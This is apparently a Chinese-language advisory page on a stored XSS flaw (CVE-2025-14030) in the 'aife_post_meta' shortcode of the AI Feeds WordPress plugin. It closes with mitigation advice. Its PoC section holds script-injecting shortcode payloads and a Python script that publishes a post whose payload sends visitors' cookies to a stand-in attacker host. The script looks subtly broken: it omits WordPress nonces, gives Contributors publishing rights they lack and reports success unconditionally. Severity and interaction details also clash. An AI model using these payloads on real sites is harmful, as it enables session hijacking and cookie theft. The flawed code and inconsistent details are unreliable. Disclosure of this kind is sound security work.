CVE-2025-14030 WordPress AI Feeds插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-14030

漏洞类型

存储型跨站脚本攻击（Stored XSS）

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

AI Feeds plugin for WordPress

漏洞概述

AI Feeds是WordPress平台上一款AI内容订阅插件，该插件在1.0.22及以下所有版本中存在严重的存储型跨站脚本（Stored Cross-Site Scripting）漏洞。漏洞根源在于插件的'aife_post_meta'短代码功能对用户输入的清理和转义处理不充分。攻击者利用此漏洞可以在包含该短代码的页面中注入任意JavaScript脚本。由于存储型XSS的特性，恶意脚本会被永久保存在服务器端，所有访问被感染页面的用户都会自动执行攻击代码。该漏洞需要认证用户具有Contributor级别或更高的权限即可利用，攻击门槛相对较低，可能导致用户会话劫持、敏感信息窃取、网页篡改等严重安全风险。

技术细节

该漏洞存在于AI Feeds插件的aife_post_meta短代码处理逻辑中。当用户在文章或页面中插入[aife_post_meta]短代码并传入特定构造的参数时，插件未能对用户输入进行充分的输入验证和输出转义。具体来说，插件在处理短代码属性参数时，直接将用户可控的内容输出到HTML页面而未进行适当的HTML实体编码。攻击者可以构造包含恶意JavaScript代码的短代码属性值，如[aife_post_meta key='" onmouseover="alert(document.cookie)"'],当其他用户访问包含该短代码的页面时，恶意脚本将在其浏览器上下文中执行。由于是存储型漏洞，攻击只需一次注入即可影响所有后续访问者。攻击者可利用此漏洞窃取Cookie、会话令牌、执行任意操作等。

攻击链分析

STEP 1

Reconnaissance

攻击者识别目标网站使用的WordPress版本及AI Feeds插件版本（≤1.0.22），确认漏洞存在

STEP 2

Authentication

攻击者获取目标WordPress网站的Contributor级别或更高权限账户

STEP 3

Payload Injection

攻击者创建或编辑文章/页面，插入包含恶意JavaScript代码的[aife_post_meta]短代码

STEP 4

Persistence

恶意短代码随文章内容永久存储在数据库中，无需持续攻击

STEP 5

Execution

受害者访问包含恶意短代码的页面时，浏览器执行注入的JavaScript脚本

STEP 6

Impact

攻击者可窃取用户Cookie、会话令牌，重定向用户或执行任意客户端操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

WordPress Stored XSS via AI Feeds 'aife_post_meta' Shortcode

// PoC: Inject malicious script via shortcode
[aife_post_meta key='xss' value='<script>alert(document.cookie)</script>']

// Alternative PoC with event handler
[aife_post_meta key='xss' value='" onmouseover="alert(String.fromCharCode(88,83,83))" style="position:fixed;top:0;left:0;width:100%;height:100%" onmouseover="']

// Automated exploitation example (Python)
import requests

target_url = "http://target-wordpress-site.com"
login_url = f"{target_url}/wp-login.php"
post_url = f"{target_url}/wp-admin/post.php"

# Login with Contributor account
session = requests.Session()
login_data = {
    "log": "attacker_username",
    "pwd": "attacker_password",
    "wp-submit": "Log In"
}
session.post(login_url, data=login_data)

# Create post with malicious shortcode
post_data = {
    "post_title": "Malicious Post",
    "post_content": "[aife_post_meta key='xss' value='<script>fetch(\"https://attacker.com/steal?c=\"+document.cookie)</script>']",
    "post_status": "publish"
}
response = session.post(post_url, data=post_data)
print("XSS payload injected successfully")

影响范围

AI Feeds plugin for WordPress ≤ 1.0.22

防御指南

临时缓解措施

立即将AI Feeds插件升级到1.0.23或更高版本；如无法立即升级，可在functions.php中添加临时过滤器禁用aife_post_meta短代码：add_shortcode('aife_post_meta', function(){return '';});同时限制Contributor用户的文章发布权限，并启用WAF防护规则检测恶意短代码注入行为。